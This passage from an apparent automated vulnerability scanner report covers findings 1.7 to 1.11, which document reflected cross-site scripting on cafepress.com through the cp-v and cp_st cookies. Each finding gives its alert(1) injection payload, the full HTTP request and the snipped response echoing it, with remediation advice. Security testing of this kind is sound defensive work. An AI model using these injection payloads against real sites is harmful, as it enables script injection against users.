__utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 93186
Date: Sun, 26 Dec 2010 13:46:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc5445"-alert(1)-"653f5650114";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.7. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1f9d</script><script>alert(1)</script>c7da687b934 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b1f9d</script><script>alert(1)</script>c7da687b934; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 93236
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'ProductDetails'
window.cafepress.tealeaf.searchTerm = 'b1f9d</script><script>alert(1)</script>c7da687b934'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.8. http://www.cafepress.com/+aprons [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+aprons

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f815"-alert(1)-"690539d6541 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 60358
Date: Sun, 26 Dec 2010 13:47:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.9. http://www.cafepress.com/+aprons [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+aprons

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87e97</script><script>alert(1)</script>edc3d2d6805 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=87e97</script><script>alert(1)</script>edc3d2d6805; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 60380
Date: Sun, 26 Dec 2010 13:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '87e97</script><script>alert(1)</script>edc3d2d6805'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.10. http://www.cafepress.com/+baby-blanket [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+baby-blanket

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60566"-alert(1)-"db88db638f9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 58705
Date: Sun, 26 Dec 2010 13:47:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.11. http://www.cafepress.com/+baby-blanket [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+baby-blanket

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b770e</script><script>alert(1)</script>35f226fbd0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b770e</script><script>alert(1)</script>35f226fbd0; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 58721
Date: Sun, 26 Dec 2010 13:47:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/
Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
